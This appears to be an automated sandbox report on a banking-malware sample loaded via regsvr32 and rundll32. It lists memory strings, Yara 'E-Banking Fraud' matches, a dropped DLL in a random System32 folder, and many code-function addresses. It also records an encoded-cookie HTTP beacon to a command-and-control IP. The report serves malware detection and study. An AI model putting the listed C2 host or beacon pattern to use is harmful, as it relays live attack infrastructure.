                      Source: svchost.exe, 0000000C.00000003.329717997.0000026D25A47000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.329708770.0000026D25A40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.329994704.0000026D25A48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
                      Source: svchost.exe, 0000000C.00000003.329717997.0000026D25A47000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.329708770.0000026D25A40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.329994704.0000026D25A48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
                      Source: svchost.exe, 0000000C.00000003.329739644.0000026D25A2E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.329969024.0000026D25A2F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gri?pv=1&r=
                      Source: svchost.exe, 0000000C.00000003.329723643.0000026D25A46000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.t
                      Source: svchost.exe, 0000000C.00000003.329674705.0000026D25A52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
                      Source: svchost.exe, 0000000C.00000003.307738609.0000026D25A30000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.329979886.0000026D25A3E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
                      Source: svchost.exe, 0000000C.00000003.307738609.0000026D25A30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
                      Source: svchost.exe, 0000000C.00000003.307738609.0000026D25A30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/roadshield.ashx?bucket=
                      Source: svchost.exe, 0000001E.00000003.548747158.000002740D21A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.548579382.000002740CDA9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.549970585.000002740D202000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.548498522.000002740CD98000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.550146620.000002740CD87000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.549907054.000002740D21A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.548483451.000002740CD87000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.hotspotshield.com/
                      Source: svchost.exe, 0000000C.00000002.329984828.0000026D25A41000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.329708770.0000026D25A40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
                      Source: svchost.exe, 0000000C.00000002.329979886.0000026D25A3E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.329947433.0000026D25A13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
                      Source: svchost.exe, 0000000C.00000003.329708770.0000026D25A40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.329723643.0000026D25A46000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
                      Source: svchost.exe, 0000000C.00000003.329708770.0000026D25A40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.329723643.0000026D25A46000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
                      Source: svchost.exe, 0000000C.00000003.307738609.0000026D25A30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
                      Source: svchost.exe, 0000000C.00000003.307738609.0000026D25A30000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.329739644.0000026D25A2E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.329969024.0000026D25A2F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
                      Source: svchost.exe, 0000000C.00000002.329947433.0000026D25A13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen
                      Source: svchost.exe, 0000001E.00000003.558333053.000002740CD89000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.disneyplus.com/legal/privacy-policy
                      Source: svchost.exe, 0000001E.00000003.558333053.000002740CD89000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.disneyplus.com/legal/your-california-privacy-rights
                      Source: svchost.exe, 0000001E.00000003.548747158.000002740D21A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.548579382.000002740CDA9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.549970585.000002740D202000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.548498522.000002740CD98000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.550146620.000002740CD87000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.549907054.000002740D21A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.548483451.000002740CD87000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.hotspotshield.com/terms/
                      Source: svchost.exe, 0000001E.00000003.548747158.000002740D21A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.548579382.000002740CDA9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.549970585.000002740D202000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.548498522.000002740CD98000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.550146620.000002740CD87000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.549907054.000002740D21A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.548483451.000002740CD87000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.pango.co/privacy
                      Source: svchost.exe, 0000001E.00000003.562074619.000002740CD87000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.tiktok.com/legal/report
                      Source: svchost.exe, 0000001E.00000003.562025764.000002740CDAE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.562096716.000002740D202000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.562062118.000002740CDAE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.562074619.000002740CD87000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.562083780.000002740CD98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.tiktok.com/legal/report/feedback
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800132F0 InternetReadFile,RtlAllocateHeap,6_2_00000001800132F0
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Cookie: atNMDL=8JgHocGxWkmbpKn0tdo/IhGKLaetTZOB/CiwzPMRN0PZhyEtDxX1w9ZLI3P1macWQoUNgjMjrDkFV/lcl2IUdBiaAKo/gu5s0aRFlnydObt5qsXc+/edR28d1nZ8xHaeYQHrD4ceCTW7KN3CrdFVrOL7q9OWe4HkOi3goo9OlcXUaAn+eDxsmLAXol1L25FR07tOlcKH8p3XLgKteJmTbxxCGtkK1PAkDHcHxGMAOGnU9j9YFxHv7IfNK/Gpzy6maq0gTlW77lz4Pep9U6Sgfe9I7o9D3xGrfSVCQRT4FKJSwZ8N4dh1GhrQvr/ywAH73tqOX8eJ8jwCp0YlcEzqrw2N9Ckstgco/YIpQ6fcHost: 23.239.0.12Connection: Keep-AliveCache-Control: no-cache
                      Source: unknownHTTPS traffic detected: 23.239.0.12:443 -> 192.168.2.3:49747 version: TLS 1.2

                      E-Banking Fraud

                      barindex
                      Source: Yara matchFile source: 6.2.regsvr32.exe.21f0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.2ace68d0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.2ace68d0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.regsvr32.exe.d00000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.26ed90d0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.26ed90d0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.regsvr32.exe.21f0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.regsvr32.exe.d00000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000004.00000002.278869387.0000026ED90D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.278205273.000002ACE68D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.663304380.00000000021F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.663485970.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.280788460.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.278417098.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.278077308.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.280524606.0000000000D00000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: C:\Windows\System32\regsvr32.exeFile deleted: C:\Windows\System32\ScjWhFiaOACVkfkp\NbnBEvmCoIR.dll:Zone.IdentifierJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeFile created: C:\Windows\system32\ScjWhFiaOACVkfkp\Jump to behavior
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00007FFC6720A77C2_2_00007FFC6720A77C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00007FFC6720E6C02_2_00007FFC6720E6C0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00007FFC67206F0C2_2_00007FFC67206F0C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00007FFC6720FB6C2_2_00007FFC6720FB6C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00007FFC6720AF702_2_00007FFC6720AF70
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00007FFC6720EB602_2_00007FFC6720EB60
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00007FFC6720B5CC2_2_00007FFC6720B5CC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00007FFC6720AA0C2_2_00007FFC6720AA0C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00007FFC6720FCA02_2_00007FFC6720FCA0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00007FFC6720895C2_2_00007FFC6720895C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00007FFC672059442_2_00007FFC67205944
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00B000002_2_00B00000
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180010FF42_2_0000000180010FF4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180028C202_2_0000000180028C20
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018002C0582_2_000000018002C058
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800091002_2_0000000180009100
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800079582_2_0000000180007958
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001C9642_2_000000018001C964
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018000C6082_2_000000018000C608
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800216182_2_0000000180021618
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180013E282_2_0000000180013E28
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001E3AC2_2_000000018001E3AC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001DBE82_2_000000018001DBE8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001FC0C2_2_000000018001FC0C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018000580C2_2_000000018000580C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800220102_2_0000000180022010
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001481C2_2_000000018001481C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018002A42C2_2_000000018002A42C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800118342_2_0000000180011834
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800238312_2_0000000180023831
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180021C3C2_2_0000000180021C3C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018000703C2_2_000000018000703C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018000AC482_2_000000018000AC48
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018000FC482_2_000000018000FC48
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800244582_2_0000000180024458
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800064582_2_0000000180006458
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001C05C2_2_000000018001C05C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001A4602_2_000000018001A460
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800298882_2_0000000180029888
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001D49C2_2_000000018001D49C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180008CA02_2_0000000180008CA0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800248A82_2_00000001800248A8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180015CB02_2_0000000180015CB0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800124B42_2_00000001800124B4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018000C4B42_2_000000018000C4B4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800288B82_2_00000001800288B8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800024B82_2_00000001800024B8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018000D8C42_2_000000018000D8C4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800250CC2_2_00000001800250CC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800190D42_2_00000001800190D4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180017CE42_2_0000000180017CE4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800264F02_2_00000001800264F0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800014F82_2_00000001800014F8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180020CFC2_2_0000000180020CFC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018002C9042_2_000000018002C904
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800179082_2_0000000180017908
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800215102_2_0000000180021510
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018000F9172_2_000000018000F917
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018000551C2_2_000000018000551C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018000F1282_2_000000018000F128
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001CD382_2_000000018001CD38
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180016D3C2_2_0000000180016D3C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001F9442_2_000000018001F944
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800181482_2_0000000180018148
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001D9502_2_000000018001D950
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800131502_2_0000000180013150
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001ED502_2_000000018001ED50
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001E9602_2_000000018001E960
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180019D602_2_0000000180019D60
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180001D682_2_0000000180001D68
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001496C2_2_000000018001496C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180002D702_2_0000000180002D70
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800245742_2_0000000180024574
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800021782_2_0000000180002178
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180024D802_2_0000000180024D80
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800185982_2_0000000180018598
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800035982_2_0000000180003598
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018002A9A82_2_000000018002A9A8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800119A82_2_00000001800119A8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180025DAC2_2_0000000180025DAC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180018DAC2_2_0000000180018DAC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800269B02_2_00000001800269B0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800059B82_2_00000001800059B8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800029BC2_2_00000001800029BC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800141C02_2_00000001800141C0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800125C42_2_00000001800125C4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800121CC2_2_00000001800121CC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018000BDD02_2_000000018000BDD0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800075D42_2_00000001800075D4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800095DC2_2_00000001800095DC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018000F9E82_2_000000018000F9E8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800026102_2_0000000180002610
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800196182_2_0000000180019618
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001FA382_2_000000018001FA38
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018000A2702_2_000000018000A270
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180019E782_2_0000000180019E78
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001DA802_2_000000018001DA80
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800246982_2_0000000180024698
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018000EE982_2_000000018000EE98
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800176B82_2_00000001800176B8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001AAB82_2_000000018001AAB8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180011AD02_2_0000000180011AD0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180008AD82_2_0000000180008AD8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800296EC2_2_00000001800296EC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018000A6EC2_2_000000018000A6EC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800132F02_2_00000001800132F0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800193002_2_0000000180019300
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001BB042_2_000000018001BB04
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018002870C2_2_000000018002870C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180026B102_2_0000000180026B10
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018000131C2_2_000000018000131C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018000671C2_2_000000018000671C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180029B282_2_0000000180029B28
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180012F282_2_0000000180012F28
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018000BB282_2_000000018000BB28
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001EB302_2_000000018001EB30
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800203342_2_0000000180020334
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800107582_2_0000000180010758
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001435C2_2_000000018001435C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180009F5C2_2_0000000180009F5C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800293682_2_0000000180029368
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800207682_2_0000000180020768
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800173782_2_0000000180017378
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800137802_2_0000000180013780
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800153882_2_0000000180015388
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018000338C2_2_000000018000338C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018000738C2_2_000000018000738C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800027902_2_0000000180002790
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180027F9C2_2_0000000180027F9C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800197A02_2_00000001800197A0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018002C7B42_2_000000018002C7B4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001DFB42_2_000000018001DFB4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001F7C02_2_000000018001F7C0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800097C02_2_00000001800097C0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800157D82_2_00000001800157D8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180019FDC2_2_0000000180019FDC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180017BDC2_2_0000000180017BDC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018000F7E02_2_000000018000F7E0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180001FE02_2_0000000180001FE0
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180010FF43_2_0000000180010FF4
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018002C0583_2_000000018002C058
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800091003_2_0000000180009100
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018000C6083_2_000000018000C608
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800216183_2_0000000180021618
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001E3AC3_2_000000018001E3AC
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001DBE83_2_000000018001DBE8
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001FC0C3_2_000000018001FC0C
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018000580C3_2_000000018000580C
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800220103_2_0000000180022010
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001481C3_2_000000018001481C
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018002A42C3_2_000000018002A42C
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800118343_2_0000000180011834
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180021C3C3_2_0000000180021C3C
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018000703C3_2_000000018000703C
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018000AC483_2_000000018000AC48
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018000FC483_2_000000018000FC48
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800064583_2_0000000180006458
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001C05C3_2_000000018001C05C
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001A4603_2_000000018001A460
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800298883_2_0000000180029888
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001D49C3_2_000000018001D49C
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180008CA03_2_0000000180008CA0
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800248A83_2_00000001800248A8
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180015CB03_2_0000000180015CB0
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800124B43_2_00000001800124B4
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018000C4B43_2_000000018000C4B4
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800288B83_2_00000001800288B8
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800024B83_2_00000001800024B8
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018000D8C43_2_000000018000D8C4
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800250CC3_2_00000001800250CC
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800190D43_2_00000001800190D4
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180017CE43_2_0000000180017CE4
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800264F03_2_00000001800264F0
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800014F83_2_00000001800014F8
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180020CFC3_2_0000000180020CFC
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018002C9043_2_000000018002C904
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800179083_2_0000000180017908
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800215103_2_0000000180021510
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018000F9173_2_000000018000F917
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018000551C3_2_000000018000551C
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018000F1283_2_000000018000F128
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001CD383_2_000000018001CD38
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180016D3C3_2_0000000180016D3C
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001F9443_2_000000018001F944
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800181483_2_0000000180018148
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001ED503_2_000000018001ED50
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800131503_2_0000000180013150
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001D9503_2_000000018001D950
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001E9603_2_000000018001E960
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180019D603_2_0000000180019D60
